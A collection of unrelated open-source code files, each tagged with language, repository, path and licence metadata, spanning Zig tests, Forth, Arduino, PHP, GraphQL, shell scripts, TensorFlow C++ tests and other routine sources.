cvector_ConstPtrSpecialRef comptime { var buf = [_]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{0xff} ** 10; var target: [*c]u8 = @ptrCast([*c]u8, &buf); const slice = target[0..13 :0xff]; _ = slice; } // slice comptime { var buf = [_]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{0xff} ** 10; var target: []u8 = &buf; const slice = target[0..13 :0xff]; _ = slice; } } test "comptime slice-sentinel in bounds (terminated)" { // array comptime { var target = [_:0]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; const slice = target[0..3 :'d']; _ = slice; } // ptr_array comptime { var buf = [_:0]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target = &buf; const slice = target[0..3 :'d']; _ = slice; } // vector_ConstPtrSpecialBaseArray comptime { var buf = [_:0]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: [*]u8 = &buf; const slice = target[0..3 :'d']; _ = slice; } // vector_ConstPtrSpecialRef comptime { var buf = [_:0]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: [*]u8 = @ptrCast([*]u8, &buf); const slice = target[0..3 :'d']; _ = slice; } // cvector_ConstPtrSpecialBaseArray comptime { var buf = [_:0]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: [*c]u8 = &buf; const slice = target[0..3 :'d']; _ = slice; } // cvector_ConstPtrSpecialRef comptime { var buf = [_:0]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: [*c]u8 = @ptrCast([*c]u8, &buf); const slice = target[0..3 :'d']; _ = slice; } // slice comptime { var buf = [_:0]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: []u8 = &buf; const slice = target[0..3 :'d']; _ = slice; } } test "comptime slice-sentinel in bounds (on target sentinel)" { // array comptime { var target = [_:0]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; const slice = target[0..14 :0]; _ = slice; } // ptr_array comptime { var buf = [_:0]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target = &buf; const slice = target[0..14 :0]; _ = slice; } // vector_ConstPtrSpecialBaseArray comptime { var buf = [_:0]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: [*]u8 = &buf; const slice = target[0..14 :0]; _ = slice; } // vector_ConstPtrSpecialRef comptime { var buf = [_:0]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: [*]u8 = @ptrCast([*]u8, &buf); const slice = target[0..14 :0]; _ = slice; } // cvector_ConstPtrSpecialBaseArray comptime { var buf = [_:0]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: [*c]u8 = &buf; const slice = target[0..14 :0]; _ = slice; } // cvector_ConstPtrSpecialRef comptime { var buf = [_:0]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: [*c]u8 = @ptrCast([*c]u8, &buf); const slice = target[0..14 :0]; _ = slice; } // slice comptime { var buf = [_:0]u8{ 'a', 'b', 'c', 'd' } ++ [_]u8{undefined} ** 10; var target: []u8 = &buf; const slice = target[0..14 :0]; _ = slice; } }
Zig
4
lukekras/zig
test/behavior/slice_sentinel_comptime.zig
[ "MIT" ]
ConvertFrom-StringData @' string1=string1 for en-US string2=string2 for en-US '@ # SIG # Begin signature block
PowerShell
4
Jellyfrog/PowerShell
test/powershell/Language/Scripting/en-US/I18n.Tests.psd1
[ "MIT" ]
interface tag DisposableActor """ An interface used to asynchronously dispose of an actor. """ be dispose()
Pony
4
presidentbeef/ponyc
packages/builtin/disposable_actor.pony
[ "BSD-2-Clause" ]
loadlib shlwapi.dll value shlwapi { ." shared-memory.fth Provides a basic interface for using shared memory between processes. This uses the interface provided by SHLWAPI.DLL, which really simplifies the process. To create shared memory between processes pid1 and pid2, use the following steps in pid1: (1) Run <size> <pid2> make-share to get a handle in both processes (2) Run <handle> <pid2> get-share for a pointer to the region (3) Note the value of the handle Then in process pid2, using the same handle value: (1) Run <handle> <pid1> get-share for a pointer to the same region If you ever want to stop using the region, release it as follows: (1) Run <addr> release-share " ETX emit }! \ HANDLE AllocShared(LPCVOID lpData, DWORD dwSize, DWORDdwProcessId) \ BOOL FreeShared(HANDLE hData, DWORD dwProcessId) \ LPVOID LockShared(HANDLE hData, DWORD dwProcessId) \ BOOL UnlockShared (LPVOID lpData) shlwapi 3 dllfun AllocShared SHAllocShared shlwapi 2 dllfun FreeShared SHFreeShared shlwapi 2 dllfun LockShared SHLockShared shlwapi 1 dllfun UnlockShared SHUnlockShared 2 value DUPLICATE_SAME_ACCESS $40 value PROCESS_DUP_HANDLE $10000000 value GENERIC_ALL : make-share ( size pid -- handle ) 0 -rot AllocShared ; : get-share ( handle pid -- addr ) LockShared ; : release-share ( addr -- ) UnlockShared ;
Forth
5
jephthai/EvilVM
samples/shared-memory.fth
[ "MIT" ]
BtargetJ0
PureBasic
0
pchandrasekaran1595/onnx
onnx/backend/test/data/node/test_nllloss_NCd1_weight_expanded/test_data_set_0/input_1.pb
[ "Apache-2.0" ]
#include <Servo.h> #if 1 // Normal servo that doesn't freak out with standard zero range. #define MIN_PULSE_WIDTH (544) #else // Off-brand servo that does freak out. #define MIN_PULSE_WIDTH (800) #endif #define SERVO_PIN (2) #define POT_PIN (7) Servo myservo; void handle_commands() { if (Serial.available()) { char b = Serial.read(); if (b >= '0' && b <= '9') { int d = (b - '0') * 18; myservo.write(d); } } } void generate_status() { static char last_pot_char = 0; int pot = analogRead(0); char pot_char = '0' + pot / 103; if (pot_char != last_pot_char) { Serial.print(pot_char); last_pot_char = pot_char; } } void set_up_servo() { myservo.attach(SERVO_PIN, MIN_PULSE_WIDTH, 2400); // Run through full range to make sure we're working. myservo.write(180); delay(500); myservo.write(0); delay(500); } void set_up_pot() { // AREF should equal power supply voltage (5V). analogReference(DEFAULT); // Supply current to pot. We did this because we'd already used // up the 5V socket for the servo. pinMode(POT_PIN, OUTPUT); digitalWrite(POT_PIN, HIGH); } void setup() { Serial.begin(57600); set_up_pot(); set_up_servo(); } void loop() { handle_commands(); generate_status(); }
Arduino
5
HannesGitH/chrome-extensions-samples
apps/samples/servo/Servo/Servo.ino
[ "Apache-2.0" ]
# ====================[ package.mask ]==================== # # --------------------( SYNOPSIS )-------------------- # List of locally provided atoms to be hard-masked. Too fast&furious users may # unmask atoms by adding an equivalent line to "/etc/portage/package.unmask". # ....................{ BROKEN }.................... # ....................{ UNSTABLE }.................... # Ditto for the SDL1 repository. ~media-libs/libsdl-1.2.9999
Mask
3
Ferroin/raiagent
profiles/package.mask
[ "FTL" ]
--TEST-- tidy_repair_*() and invalid parameters --EXTENSIONS-- tidy --FILE-- <?php $l = 1; $s = ""; tidy_repair_string($s, $l, $l); tidy_repair_string($s, $s, $s); tidy_repair_string($l, $l, $l); try { tidy_repair_file($s, $l, $l, $l); } catch (\ValueError $e) { echo $e->getMessage() . \PHP_EOL; } try { tidy_repair_file($s, $s, $s, $s); } catch (\ValueError $e) { echo $e->getMessage() . \PHP_EOL; } tidy_repair_file($l, $l, $l ,$l); // This doesn't emit any warning, TODO look into echo "Done\n"; ?> --EXPECTF-- Warning: tidy_repair_string(): Could not load configuration file "1" in %s on line %d Warning: tidy_repair_string(): Could not set encoding "1" in %s on line %d Warning: tidy_repair_string(): Could not load configuration file "" in %s on line %d Warning: tidy_repair_string(): Could not load configuration file "1" in %s on line %d Warning: tidy_repair_string(): Could not set encoding "1" in %s on line %d Path cannot be empty Path cannot be empty Done
PHP
3
NathanFreeman/php-src
ext/tidy/tests/019.phpt
[ "PHP-3.01" ]
# source: https://graphql-with-prisma-relay.weakky.vercel.app/api # timestamp: Fri Jul 31 2020 18:27:09 GMT+0200 (Central European Summer Time) type BlogPost implements Node { id: ID! title: String! content: String! createdAt: DateTime! updatedAt: DateTime! } type BlogPostConnection { """ https://facebook.github.io/relay/graphql/connections.htm#sec-Edge-Types """ edges: [BlogPostEdge] """ https://facebook.github.io/relay/graphql/connections.htm#sec-undefined.PageInfo """ pageInfo: PageInfo! } type BlogPostEdge { """ https://facebook.github.io/relay/graphql/connections.htm#sec-Cursor """ cursor: String! """ https://facebook.github.io/relay/graphql/connections.htm#sec-Node """ node: BlogPost! } input BlogPostOrderBy { createdAt: OrderBy updatedAt: OrderBy } scalar DateTime type Mutation { createBlogPost(title: String!, content: String!): BlogPost! } interface Node { id: ID! } enum OrderBy { asc desc } """ PageInfo cursor, as defined in https://facebook.github.io/relay/graphql/connections.htm#sec-undefined.PageInfo """ type PageInfo { """ Used to indicate whether more edges exist following the set defined by the clients arguments. """ hasNextPage: Boolean! """ Used to indicate whether more edges exist prior to the set defined by the clients arguments. """ hasPreviousPage: Boolean! """ The cursor corresponding to the first nodes in edges. Null if the connection is empty. """ startCursor: String """ The cursor corresponding to the last nodes in edges. Null if the connection is empty. """ endCursor: String } type Query { node(id: String!): Node! viewer: Viewer! } type User implements Node { id: ID! firstName: String! lastName: String! email: String! createdAt: DateTime! updatedAt: DateTime! } type UserConnection { """ https://facebook.github.io/relay/graphql/connections.htm#sec-Edge-Types """ edges: [UserEdge] """ https://facebook.github.io/relay/graphql/connections.htm#sec-undefined.PageInfo """ pageInfo: PageInfo! } type UserEdge { """ https://facebook.github.io/relay/graphql/connections.htm#sec-Cursor """ cursor: String! """ https://facebook.github.io/relay/graphql/connections.htm#sec-Node """ node: User! } type Viewer { BlogPost(id: String!): BlogPost! allBlogPosts( orderBy: BlogPostOrderBy """ Returns the first n elements from the list. """ first: Int! """ Returns the elements in the list that come after the specified cursor """ after: String ): BlogPostConnection! User(id: String!): User! allUsers( """ Returns the first n elements from the list. """ first: Int! """ Returns the elements in the list that come after the specified cursor """ after: String ): UserConnection! }
GraphQL
5
blomqma/next.js
examples/with-reason-relay/schema/schema.graphql
[ "MIT" ]
#!/bin/tcsh # # so: try and have files lasting at least $retention_time; # # # dquota is the quota of the area # minfree must be the minimum free area to complete current operations # # if disk used more than $maxdisk, delete the oldest ones respecting the previous requirement # if disk used more than $maxdisk, delete the oldest ones without respecting the previous requirement, but then send a WARNING set verb=0 set AREA=/afs/cern.ch/cms/CAF/CMSCOMM/COMM_GLOBAL/EventDisplay/RootFileTempStorageArea # # in hours # set retention_time=1 # # disk quota (in kB) # # this is 10 GB set dquota=10000000 # # minfree (in kB) # # this is 1 GB set minfree=1000000 @ maxdisk= $dquota - $minfree if ($verb) then echo Setting maxdisk to $maxdisk endif # # get disk used # cd $AREA set used=`du -s |awk '{print $1}'` if ($verb) then echo Used disk is $used endif if ($used < $maxdisk) then # # nothing to do # if ($verb) then echo Exit with code 0 endif exit 0 endif # first test - see if you can clean applying retention time if ($used > $maxdisk) then if ($verb) then echo Running tmpwatch endif echo tmpwatch --verbose --atime $retention_time . endif # # now look whether situation is good # set newused=`du -s |awk '{print $1}'` if ($verb) then echo Now used is $newused endif if ($newused < $maxdisk) then # # I am happy, I bail out # exit 2 = i had to delete, but just stuff I could delete exit 2 endif # # else, delete files in order of age, one by one # while ($newused > $maxdisk) # # find the oldest file set file=`ls -t1|tail -1` echo rm -f $file #calculate new disk free set newused=`du -s |awk '{print $1}'` # end #exit three means I had to delete stuff not expired exit 3 #
Tcsh
4
ckamtsikis/cmssw
DPGAnalysis/Skims/python/clearTemporaryArea.csh
[ "Apache-2.0" ]
/* Copyright 2017 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ==============================================================================*/ #include "tensorflow/core/grappler/optimizers/custom_graph_optimizer_registry.h" #include <algorithm> #include <memory> #include <string> #include <vector> #include "tensorflow/core/grappler/optimizers/custom_graph_optimizer.h" #include "tensorflow/core/lib/core/status.h" #include "tensorflow/core/platform/test.h" namespace tensorflow { namespace grappler { namespace { static const char* kTestOptimizerName = "Test"; static const char* kTestPluginOptimizerName = "TestPlugin"; class TestGraphOptimizer : public CustomGraphOptimizer { public: Status Init( const tensorflow::RewriterConfig_CustomGraphOptimizer* config) override { return Status::OK(); } string name() const override { return kTestOptimizerName; } bool UsesFunctionLibrary() const override { return false; } Status Optimize(Cluster* cluster, const GrapplerItem& item, GraphDef* optimized_graph) override { return Status::OK(); } }; REGISTER_GRAPH_OPTIMIZER_AS(TestGraphOptimizer, "StaticRegister"); TEST(CustomGraphOptimizerRegistryTest, DynamicRegistration) { std::vector<string> optimizers = CustomGraphOptimizerRegistry::GetRegisteredOptimizers(); std::unique_ptr<const CustomGraphOptimizer> test_optimizer; ASSERT_EQ( 0, std::count(optimizers.begin(), optimizers.end(), "DynamicRegister")); test_optimizer = CustomGraphOptimizerRegistry::CreateByNameOrNull("DynamicRegister"); EXPECT_EQ(nullptr, test_optimizer); CustomGraphOptimizerRegistry::RegisterOptimizerOrDie( []() { return new TestGraphOptimizer; }, "DynamicRegister"); optimizers = CustomGraphOptimizerRegistry::GetRegisteredOptimizers(); ASSERT_EQ( 1, std::count(optimizers.begin(), optimizers.end(), "DynamicRegister")); test_optimizer = CustomGraphOptimizerRegistry::CreateByNameOrNull("DynamicRegister"); ASSERT_NE(nullptr, test_optimizer); EXPECT_EQ(kTestOptimizerName, test_optimizer->name()); } TEST(CustomGraphOptimizerRegistryTest, StaticRegistration) { const std::vector<string> optimizers = CustomGraphOptimizerRegistry::GetRegisteredOptimizers(); EXPECT_EQ(1, std::count(optimizers.begin(), optimizers.end(), "StaticRegister")); std::unique_ptr<const CustomGraphOptimizer> test_optimizer = CustomGraphOptimizerRegistry::CreateByNameOrNull("StaticRegister"); ASSERT_NE(nullptr, test_optimizer); EXPECT_EQ(kTestOptimizerName, test_optimizer->name()); } TEST(GraphOptimizerRegistryTest, CrashesOnDuplicateRegistration) { const auto creator = []() { return new TestGraphOptimizer; }; EXPECT_DEATH(CustomGraphOptimizerRegistry::RegisterOptimizerOrDie( creator, "StaticRegister"), "twice"); } class TestPluginGraphOptimizer : public CustomGraphOptimizer { public: Status Init( const tensorflow::RewriterConfig_CustomGraphOptimizer* config) override { return Status::OK(); } string name() const override { return kTestPluginOptimizerName; } bool UsesFunctionLibrary() const override { return false; } Status Optimize(Cluster* cluster, const GrapplerItem& item, GraphDef* optimized_graph) override { return Status::OK(); } }; TEST(PluginGraphOptimizerRegistryTest, CrashesOnDuplicateRegistration) { const auto creator = []() { return new TestPluginGraphOptimizer; }; ConfigList config_list; PluginGraphOptimizerRegistry::RegisterPluginOptimizerOrDie(creator, "GPU", config_list); PluginGraphOptimizerRegistry::RegisterPluginOptimizerOrDie(creator, "CPU", config_list); EXPECT_DEATH(PluginGraphOptimizerRegistry::RegisterPluginOptimizerOrDie( creator, "GPU", config_list), "twice"); } } // namespace } // namespace grappler } // namespace tensorflow
C++
3
EricRemmerswaal/tensorflow
tensorflow/core/grappler/optimizers/custom_graph_optimizer_registry_test.cc
[ "Apache-2.0" ]
Written by Erik Bosman WHILE_THERE_IS_DATA: ++[ - [- >>+[>]++[<]< ADD_A_PLUS_SYMBOL ] >>+[>]<--[++>++++>]+[<]< REMOVE_THE_LAST_PLUS_OR_ADD_A_MINUS_ IF_THERE_WERE_NONE <++] TO_THE_END: >>>[>] TWO_MINUS_SYMBOLS: ++++>++++ WHILE_THERE_IS_ONE_BACKWARDS: [ nr 15x 1x PRINT_SYMBOL: -- PLUS [+ >+ >++++<< RIGHT [-- > >-- << LEFT [- >- < MINUS [--- > >+ << DOT [+ >+++ < BRACKET [+ > >++ << ]]]]]] BRACKET >+++[>+++++ +++++ +++++<-]>--.<<< ]
Brainfuck
3
RubenNL/brainheck
examples/quine/quine-505-commented.bf
[ "Apache-2.0" ]
DROP TABLE "author";
SQL
0
gh-oss-contributor/graphql-engine-1
cli/integration_test/v3/migrations/default/2_add_table_test.down.sql
[ "Apache-2.0", "MIT" ]
#!/usr/bin/env bash # Copyright 2016 The Kubernetes Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Make bucket and a folder for e2e-node test logs. # Populate the folder from the logs stored in /tmp/_artifacts/ in the same way as a # jenkins build would, and then print the URL to view the test results on Gubernator set -o errexit set -o nounset set -o pipefail KUBE_ROOT=$(dirname "${BASH_SOURCE[0]}")/../.. source "${KUBE_ROOT}/hack/lib/logging.sh" if [[ $# -eq 0 || ! $1 =~ ^[Yy]$ ]]; then read -r -p "Do you want to run gubernator.sh and upload logs publicly to GCS? [y/n]" yn echo if [[ ! $yn =~ ^[Yy]$ ]]; then exit 1 fi fi # Check that user has gsutil if [[ $(which gsutil) == "" ]]; then echo "Could not find gsutil when running \`which gsutil\`" exit 1 fi # Check that user has gcloud if [[ $(which gcloud) == "" ]]; then echo "Could not find gcloud when running: \`which gcloud\`" exit 1 fi # Check that user has Credentialed Active account if ! gcloud auth list | grep -q "ACTIVE"; then echo "Could not find active account when running: \`gcloud auth list\`" exit 1 fi readonly gcs_acl="public-read" bucket_name="${USER}-g8r-logs" echo "" V=2 kube::log::status "Using bucket ${bucket_name}" # Check if the bucket exists if ! gsutil ls gs:// | grep -q "gs://${bucket_name}/"; then V=2 kube::log::status "Creating public bucket ${bucket_name}" gsutil mb "gs://${bucket_name}/" # Make all files in the bucket publicly readable gsutil acl ch -u AllUsers:R "gs://${bucket_name}" else V=2 kube::log::status "Bucket already exists" fi # Path for e2e-node test results GCS_JOBS_PATH="gs://${bucket_name}/logs/e2e-node" ARTIFACTS=${ARTIFACTS:-"/tmp/_artifacts"} BUILD_LOG_PATH="${ARTIFACTS}/build-log.txt" if [[ ! -e $BUILD_LOG_PATH ]]; then echo "Could not find build-log.txt at ${BUILD_LOG_PATH}" exit 1 fi # Get start and end timestamps based on build-log.txt file contents # Line where the actual tests start start_line=$(grep -n -m 1 "^=" "${BUILD_LOG_PATH}" | sed 's/\([0-9]*\).*/\1/') # Create text file starting where the tests start after_start=$(tail -n "+${start_line}" "${BUILD_LOG_PATH}") echo "${after_start}" >> build-log-cut.txt # Match the first timestamp start_time_raw=$(grep -m 1 -o '[0-9][0-9][0-9][0-9][[:blank:]][0-9][0-9]:[0-9][0-9]:[0-9][0-9].[0-9]*' build-log-cut.txt) rm build-log-cut.txt # Make the date readable by date command (ex: 0101 00:00:00.000 -> 01/01 00:00:00.000) start_time=$(echo "${start_time_raw}" | sed 's/^.\{2\}/&\//') V=2 kube::log::status "Started at ${start_time}" # Match the last timestamp in the build-log file end_time=$(grep -o '[0-9][0-9][0-9][0-9][[:blank:]][0-9][0-9]:[0-9][0-9]:[0-9][0-9].[0-9]*' "${BUILD_LOG_PATH}" | tail -1 | sed 's/^.\{2\}/&\//') # Convert to epoch time for Gubernator start_time_epoch=$(date -d "${start_time}" +%s) end_time_epoch=$(date -d "${end_time}" +%s) # Make folder name for build from timestamp BUILD_STAMP=$(echo "${start_time}" | sed 's/\///' | sed 's/ /_/') GCS_LOGS_PATH="${GCS_JOBS_PATH}/${BUILD_STAMP}" # Check if folder for same logs already exists if gsutil ls "${GCS_JOBS_PATH}" | grep -q "${BUILD_STAMP}"; then V=2 kube::log::status "Log files already uploaded" echo "Gubernator linked below:" echo "k8s-gubernator.appspot.com/build/${GCS_LOGS_PATH}?local=on" exit fi while IFS= read -r result; do if [[ $result != "" && $result != "${ARTIFACTS}/results" && $result != "${ARTIFACTS}" ]]; then mv "${result}/"* "${ARTIFACTS}" fi done < <(find "${ARTIFACTS}" -type d -name "results") # Upload log files for upload_attempt in $(seq 3); do if [[ -d "${ARTIFACTS}" && -n $(ls -A "${ARTIFACTS}") ]]; then V=2 kube::log::status "Uploading artifacts" gsutil -m -q -o "GSUtil:use_magicfile=True" cp -a "${gcs_acl}" -r -c \ -z log,xml,json "${ARTIFACTS}" "${GCS_LOGS_PATH}/artifacts" || continue fi break done for upload_attempt in $(seq 3); do if [[ -e "${BUILD_LOG_PATH}" ]]; then V=2 kube::log::status "Uploading build log" gsutil -q cp -Z -a "${gcs_acl}" "${BUILD_LOG_PATH}" "${GCS_LOGS_PATH}" || continue fi break done # Find the k8s version for started.json version="" if [[ -e "version" ]]; then version=$(cat "version") elif [[ -e "hack/lib/version.sh" ]]; then source "hack/lib/version.sh" kube::version::get_version_vars version="${KUBE_GIT_VERSION-}" fi if [[ -n "${version}" ]]; then V=2 kube::log::status "Found Kubernetes version: ${version}" else V=2 kube::log::status "Could not find Kubernetes version" fi #Find build result from build-log.txt if grep -Fxq "Test Suite Passed" "${BUILD_LOG_PATH}" then build_result="SUCCESS" else build_result="FAILURE" fi V=4 kube::log::status "Build result is ${build_result}" if [[ -e "${ARTIFACTS}/started.json" ]]; then rm "${ARTIFACTS}/started.json" fi if [[ -e "${ARTIFACTS}/finished.json" ]]; then rm "${ARTIFACTS}/finished.json" fi V=2 kube::log::status "Constructing started.json and finished.json files" cat <<EOF >"${ARTIFACTS}/started.json" { "version": "${version}", "timestamp": ${start_time_epoch}, "jenkins-node": "${NODE_NAME:-}" } EOF cat <<EOF >"${ARTIFACTS}/finished.json" { "result": "${build_result}", "timestamp": ${end_time_epoch} } EOF # Upload started.json V=2 kube::log::status "Uploading started.json and finished.json" V=2 kube::log::status "Run started at ${start_time}" json_file="${GCS_LOGS_PATH}/started.json" for upload_attempt in $(seq 3); do V=2 kube::log::status "Uploading started.json to ${json_file} (attempt ${upload_attempt})" gsutil -q -h "Content-Type:application/json" cp -a "${gcs_acl}" "${ARTIFACTS}/started.json" \ "${json_file}" || continue break done # Upload finished.json for upload_attempt in $(seq 3); do V=2 kube::log::status "Uploading finished.json to ${GCS_LOGS_PATH} (attempt ${upload_attempt})" gsutil -q -h "Content-Type:application/json" cp -a "${gcs_acl}" "${ARTIFACTS}/finished.json" \ "${GCS_LOGS_PATH}/finished.json" || continue break done echo "Gubernator linked below:" echo "k8s-gubernator.appspot.com/build/${bucket_name}/logs/e2e-node/${BUILD_STAMP}"
Shell
4
columbus9963/kubernetes
test/e2e_node/gubernator.sh
[ "Apache-2.0" ]
// Assumes the following uniforms exist in the surrounding context: // uniform vec3 camera_center; // uniform mat3 camera_rotation; vec3 get_rotated_surface_unit_normal_vector(vec3 point, vec3 du_point, vec3 dv_point){ vec3 cp = cross( (du_point - point), (dv_point - point) ); if(length(cp) == 0){ // Instead choose a normal to just dv_point - point in the direction of point vec3 v2 = dv_point - point; cp = cross(cross(v2, point), v2); } return normalize(rotate_point_into_frame(cp)); }
GLSL
4
iterater/manim
manimlib/shaders/inserts/get_rotated_surface_unit_normal_vector.glsl
[ "MIT" ]
#Feature: List of scenarios. #Scenario: Business rule through list of steps with arguments. #Given: Some precondition step #When: Some key actions #Then: To observe outcomes or validation #And,But: To enumerate more Given,When,Then steps #Scenario Outline: List of steps for data-driven as an Examples and <placeholder> #Sample Feature Definition Template @tag Feature: Title of your feature I want to use this template for my feature file @tag1 Scenario: Title of your scenario Given I want to write a step with precondition And some other precondition When I complete action And some other action And yet another action Then I validate the outcomes And check more outcomes @tag2 Scenario Outline: Title of your scenario outline Given I want to write a step with <name> When I check for the <value> in step Then I verify the <status> in step Examples: | name |value | status | | name1 | 5 | success| | name2 | 7 | Fail |
Cucumber
4
MalcolmScoffable/openapi-generator
samples/server/petstore/java-pkmst/src/test/resources/com/prokarma/pkmst/cucumber/Pkmst.feature
[ "Apache-2.0" ]
= Store password hash in accounts table By default, Rodauth stores the password hash in a separate +account_password_hashes+ table. This makes it a lot less likely that the password hashes will be leaked, especially if you use Rodauth's default approach of using database functions for checking the hashes. However, if you have reasons for storing the password hashes in +accounts+ table that outweigh the security benefits of Rodauth's default approach, Rodauth supports that. To do this, add the password hash column to the +accounts+ table: alter_table :accounts do add_column :password_hash, String end And then tell Rodauth to use it: plugin :rodauth do enable :login, :logout # Use the password_hash column in the accounts table account_password_hash_column :password_hash end
RDoc
4
dmitryzuev/rodauth
doc/guides/password_column.rdoc
[ "MIT" ]
{% extends "admin/change_list_object_tools.html" %} {% load i18n admin_urls %} {% block object-tools-items %} <li><a href="#" id="change-list-export" class="override-change_list_object_tools change-list-object-tools-item">{% translate "Export" %}</a></li> {{ block.super }} {% endblock %}
HTML
4
jpmallarino/django
tests/admin_views/templates/admin/admin_views/article/change_list_object_tools.html
[ "BSD-3-Clause", "0BSD" ]
/* -*- Mode: IDL; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ /* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this file, * You can obtain one at http://mozilla.org/MPL/2.0/. * * The origin of this IDL file is * https://dvcs.w3.org/hg/dap/raw-file/default/media-stream-capture/ImageCapture.html * * Copyright © 2012-2014 W3C® (MIT, ERCIM, Keio, Beihang), All Rights Reserved. * W3C liability, trademark and document use rules apply. */ [Pref="dom.imagecapture.enabled", Constructor(MediaStreamTrack videoTrack)] interface ImageCapture { Promise<Blob> takePhoto(optional PhotoSettings photoSettings); Promise<PhotoCapabilities> getPhotoCapabilities(); Promise<PhotoSettings> getPhotoSettings(); Promise<ImageBitmap> grabFrame(); readonly attribute MediaStreamTrack track; };
WebIDL
4
dkozma/wasm-bindgen
crates/web-sys/webidls/unstable/ImageCapture.webidl
[ "Apache-2.0", "MIT" ]
{ "patcher" : { "fileversion" : 1, "appversion" : { "major" : 5, "minor" : 1, "revision" : 9 } , "rect" : [ 96.0, 68.0, 412.0, 715.0 ], "bglocked" : 0, "defrect" : [ 96.0, 68.0, 412.0, 715.0 ], "openrect" : [ 0.0, 0.0, 0.0, 0.0 ], "openinpresentation" : 1, "default_fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "gridonopen" : 0, "gridsize" : [ 15.0, 15.0 ], "gridsnaponopen" : 0, "toolbarvisible" : 1, "boxanimatetime" : 200, "imprint" : 0, "enablehscroll" : 1, "enablevscroll" : 1, "devicewidth" : 0.0, "boxes" : [ { "box" : { "bgcolor" : [ 1.0, 1.0, 1.0, 1.0 ], "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-11", "maxclass" : "message", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 195.0, 495.0, 133.0, 18.0 ], "presentation" : 1, "presentation_rect" : [ 45.0, 210.0, 133.0, 18.0 ], "text" : "Reload pitch mappings" } } , { "box" : { "color" : [ 0.945098, 0.913725, 0.407843, 1.0 ], "fontname" : "Arial Bold", "fontsize" : 14.0, "id" : "obj-2", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "" ], "patcher" : { "fileversion" : 1, "appversion" : { "major" : 5, "minor" : 1, "revision" : 9 } , "rect" : [ 480.0, 112.0, 516.0, 332.0 ], "bglocked" : 0, "defrect" : [ 480.0, 112.0, 516.0, 332.0 ], "openrect" : [ 0.0, 0.0, 0.0, 0.0 ], "openinpresentation" : 0, "default_fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "gridonopen" : 0, "gridsize" : [ 15.0, 15.0 ], "gridsnaponopen" : 0, "toolbarvisible" : 1, "boxanimatetime" : 200, "imprint" : 0, "enablehscroll" : 1, "enablevscroll" : 1, "devicewidth" : 0.0, "boxes" : [ { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-12", "maxclass" : "comment", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 210.0, 180.0, 246.0, 20.0 ], "text" : "• Output original or mapped pitch (if present)" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-10", "maxclass" : "comment", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 210.0, 150.0, 238.0, 20.0 ], "text" : "• Look for each pitch in our mappings table" } } , { "box" : { "id" : "obj-8", "maxclass" : "button", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "bang" ], "patching_rect" : [ 150.0, 90.0, 20.0, 20.0 ] } } , { "box" : { "comment" : "", "id" : "obj-3", "maxclass" : "inlet", "numinlets" : 0, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 150.0, 45.0, 25.0, 25.0 ] } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-4", "maxclass" : "message", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 150.0, 120.0, 135.0, 18.0 ], "text" : "read pitch-mappings.txt" } } , { "box" : { "comment" : "", "id" : "obj-2", "maxclass" : "outlet", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 60.0, 240.0, 25.0, 25.0 ] } } , { "box" : { "comment" : "", "id" : "obj-1", "maxclass" : "inlet", "numinlets" : 0, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 60.0, 45.0, 25.0, 25.0 ] } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-15", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 60.0, 180.0, 52.0, 20.0 ], "text" : "pv pitch" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-13", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 3, "outlettype" : [ "bang", "int", "int" ], "patching_rect" : [ 60.0, 